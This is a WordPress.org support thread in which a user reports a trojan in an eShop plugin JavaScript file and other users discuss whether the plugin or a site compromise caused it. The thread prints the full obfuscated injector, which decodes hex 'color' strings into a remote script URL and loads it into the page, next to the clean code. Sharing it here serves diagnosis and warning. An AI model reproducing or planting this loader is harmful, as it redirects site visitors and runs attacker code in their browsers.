Title: Trojan
Last modified: August 19, 2016

---

# Trojan

 *  Anonymous User 7265597
 * (@anonymized-7265597)
 * [15 years, 1 month ago](https://wordpress.org/support/topic/plugin-eshop-trojan/)
 * Found a eshop javascript file in the uploads folder. Avast and a number of other
   files recognised this as a trojan,
 * redirected customers making purchases to a Romanian website and/or to pradid.
   com/engine
 * use with extreme caution!

Viewing 4 replies - 1 through 4 (of 4 total)

 *  [Clayton James](https://wordpress.org/support/users/claytonjames/)
 * (@claytonjames)
 * [15 years, 1 month ago](https://wordpress.org/support/topic/plugin-eshop-trojan/#post-2011596)
 * I would be concerned about the possibility that the script might not be related
   to the eShop plugin, but instead found it’s way to your site through other means.
   Don’t dismiss the possibility that there may be more than one explanation, unless
   you have solid evidence otherwise.
 *  Thread Starter Anonymous User 7265597
 * (@anonymized-7265597)
 * [15 years, 1 month ago](https://wordpress.org/support/topic/plugin-eshop-trojan/#post-2011657)
 * Not dismissing any possibilities at all, but wordpress users should be aware 
   that it might be a security issue if it can be targeted.
 *     ```
       if (typeof(redef_colors)=="undefined")
       {
   
       var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e4745', '#3d4444', '#3d4043', '#3f3d41', '#3f423e', '#79823e', '#798084', '#748188', '#3d7c78', '#7d3d7f', '#777f31', '#4d0000');
   
       var redef_colors = 1;
          var colors_picked = 0;
   
          function div_pick_colors(t,styled) {
   
       var s = "";
       	for (j=0;j<t.length;j++) {	
   
       var c_rgb = t[j];
       		for (i=1;i<7;i++) {
   
       var c_clr = c_rgb.substr(i++,2);
       			if (c_clr!="00") s += String.fromCharCode(parseInt(c_clr,16)-15);
       		}
       	}
   
       if (styled) {
       		s = s.substr(0,36) + s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime() + s.substr((s.length-2));
       	} else {
       		s = s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime();
       	}
       	return s;
          }
   
          function try_pick_colors() {
       	try {
       	   	if(!document.getElementById || !document.createElement){
       			document.write(div_pick_colors(div_colors,1));
       		   } else {
       			var new_cstyle=document.createElement("script");
       			new_cstyle.type="text/javascript";
       			new_cstyle.src=div_pick_colors(div_colors,0);
       			document.getElementsByTagName("head")[0].appendChild(new_cstyle);
       		}
       	} catch(e) { }
       	try {
       		check_colors_picked();
       	} catch(e) {
       		setTimeout("try_pick_colors()", 500);
       	}
          }
   
          try_pick_colors();
   
       }$eshopj=jQuery.noConflict();
       $eshopj(document).ready(function () {
           $eshopj('#eshopgateway').submit();
   
       });
       ```
   
 * this is the code that anti-virus does not like the however the clean version 
   should be
 *     ```
       $eshopj=jQuery.noConflict();
       $eshopj(document).ready(function () {
           $eshopj('#eshopgateway').submit();
   
       });
       ```
   
 *  [Clayton James](https://wordpress.org/support/users/claytonjames/)
 * (@claytonjames)
 * [15 years, 1 month ago](https://wordpress.org/support/topic/plugin-eshop-trojan/#post-2011676)
 * I’ve seen similar instances of this.
 * [http://sucuri.net/malware/malware-entry-mwjs1240](http://sucuri.net/malware/malware-entry-mwjs1240)
 * [http://malware.im/blackhole-defs_colors-and-createcss-injections/](http://malware.im/blackhole-defs_colors-and-createcss-injections/)
 * Perhaps your configuration left some files writable somehow.
 * There may be other helpful info here as well;
 * [“function div_pick_colors(t,styled)”](http://www.google.com/#sclient=psy&hl=en&q=+%22function+div_pick_colors%28t%2Cstyled%29%22&aq=f&aqi=&aql=&oq=&pbx=1&bav=on.2,or.r_gc.r_pw.&fp=c99decee79d1fe4a)
 *  Anonymous User
 * (@anonymized-3085)
 * [15 years, 1 month ago](https://wordpress.org/support/topic/plugin-eshop-trojan/#post-2011680)
 * check your information before posting such ridiculous and slanderous claims. 
   Re download eShop and you’ll see that it does not contain the so called trojan
   you mention.

Viewing 4 replies - 1 through 4 (of 4 total)

The topic ‘Trojan’ is closed to new replies.

 * ![](https://s.w.org/plugins/geopattern-icon/eshop_d6e4b8.svg)
 * [eShop](https://wordpress.org/plugins/eshop/)
 * [Frequently Asked Questions](https://wordpress.org/plugins/eshop/#faq)
 * [Support Threads](https://wordpress.org/support/plugin/eshop/)
 * [Active Topics](https://wordpress.org/support/plugin/eshop/active/)
 * [Unresolved Topics](https://wordpress.org/support/plugin/eshop/unresolved/)
 * [Reviews](https://wordpress.org/support/plugin/eshop/reviews/)

 * 4 replies
 * 3 participants
 * Last reply from: Anonymous User
 * Last activity: [15 years, 1 month ago](https://wordpress.org/support/topic/plugin-eshop-trojan/#post-2011680)
 * Status: not resolved